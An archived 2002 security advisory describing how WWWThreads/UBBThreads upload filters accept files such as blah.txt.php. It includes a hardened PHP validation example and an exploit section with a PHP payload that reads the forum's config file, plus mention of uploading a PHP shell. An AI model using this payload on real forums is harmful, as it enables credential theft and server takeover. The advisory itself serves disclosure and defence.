
WWWThreads and UBBThreads upload file restrictions by type may be bypassed



31st Jan 2002 [SBWID-5052]
COMMAND

	WWWThreads and UBBThreads upload file restrictions by type may be bypassed

SYSTEMS AFFECTED

	WWWThreads and UBBThreads 5.5 Dev11 and prior

PROBLEM

	From RootExtractor CompuMe of recm security team advisory
	[http://hop.to/condor]:
	

	The vulnerability lies in the following configuration file:

	..: config.inc.php :..

	------------------------- snip ------------------------------

	// $config['excludefiles'] = ".php,.asp,.js,.vbs,.sht,.htm";
	   $config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";

	------------------------- snip ------------------------------

	The bug is that files whose extensions are not in the allowed list can
	still be uploaded. The extension is checked, but if an allowed extension
	is placed in the filename before the bogus one, the file is accepted.
	

	

	Example:

	You allow the upload of .txt, .jpg, .bmp and .zip; all files that don't
	have those extensions should not be uploaded. However, if somebody
	renames the file to blah.txt.php, the file will validate and
	upload...... huh!
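	The weak and the hardened extension checks side by side, as an added
	example written for this page (PHP, not WWWThreads/UBBThreads code).
	The weak check is a hypothetical reconstruction of the behaviour the
	advisory describes: a name passes if any allowed extension appears
	anywhere in it. The hardened check takes only the final extension,
	consults the exclude list first, and rejects names with no usable
	extension. The helper names weakCheck, strictCheck and parseList and
	the sample filenames are this example's own; the two config strings are
	copied from the snippet above.

```php
<?php
// Added example, not code from WWWThreads/UBBThreads. The two config
// strings are the ones quoted in the advisory; everything else is
// constructed for this demonstration.
$config = [];
$config['excludefiles'] = ".php,.asp,.js,.vbs,.sht,.htm";
$config['allowfiles']   = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";

// Split a ".a,.b,.c" list into lower-cased extensions, dropping blanks.
function parseList(string $csv): array {
    $parts = array_map(fn($e) => strtolower(trim($e)), explode(',', $csv));
    return array_values(array_filter($parts, fn($e) => $e !== ''));
}

// Weak check (assumed behaviour): accept if an allowed extension occurs
// anywhere in the name. "blah.txt.php" passes because it contains ".txt".
function weakCheck(string $name, array $config): bool {
    foreach (parseList($config['allowfiles']) as $ext) {
        if (stripos($name, $ext) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened check: only the last extension counts, the exclude list is
// applied first, and names with no real extension are refused.
function strictCheck(string $name, array $config): bool {
    $base = basename($name);                 // ignore any path component
    $dot  = strrpos($base, '.');
    if ($dot === false || $dot === 0 || $dot === strlen($base) - 1) {
        return false;                        // no extension, dotfile, trailing dot
    }
    $ext = strtolower(substr($base, $dot));  // e.g. ".php", dot included
    if (in_array($ext, parseList($config['excludefiles']), true)) {
        return false;
    }
    return in_array($ext, parseList($config['allowfiles']), true);
}

// Constructed sample names: the advisory's blah.txt.php plus a few edge cases.
$samples = ['photo.jpg', 'blah.txt.php', 'notes.txt', 'shell.php',
            'archive.ZIP', '.htaccess', 'report.'];
foreach ($samples as $s) {
    printf("%-14s weak=%-5s strict=%s\n", $s,
        weakCheck($s, $config) ? 'allow' : 'deny',
        strictCheck($s, $config) ? 'allow' : 'deny');
}
```

	With these inputs the weak check lets blah.txt.php through while the
	hardened check refuses it, and both agree on plain photo.jpg and
	shell.php. Note that in the snippet the excludefiles line is commented
	out, so in that configuration the exclude list is empty and the allow
	list alone decides; the hardened check still refuses blah.txt.php
	because its final extension is not in the allow list. A filename check
	is only one layer: store uploads where the web server does not execute
	scripts, and do not rely on the original name at all when serving them.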
	

	Exploit:
	=========
	

	

	1) make a new file:   $ touch blah.txt.php

	2) edit it:           $ vi blah.txt.php (in this step, write PHP
	                        code, for example)

	            <?php
	            // read the forum's config through the uploaded script
	            $readfile = join("", file("../config.inc.php"));
	            print $readfile;
	            ?>

	3) save & upload it

	4) visit your blah file; now you can see the config file of the
	   victim forum

	5) I replaced the readfile code with a PHP shell file

	

SOLUTION

	Upgrade to UBBThreads 5.5 from:

	http://www.infopop.com/

	

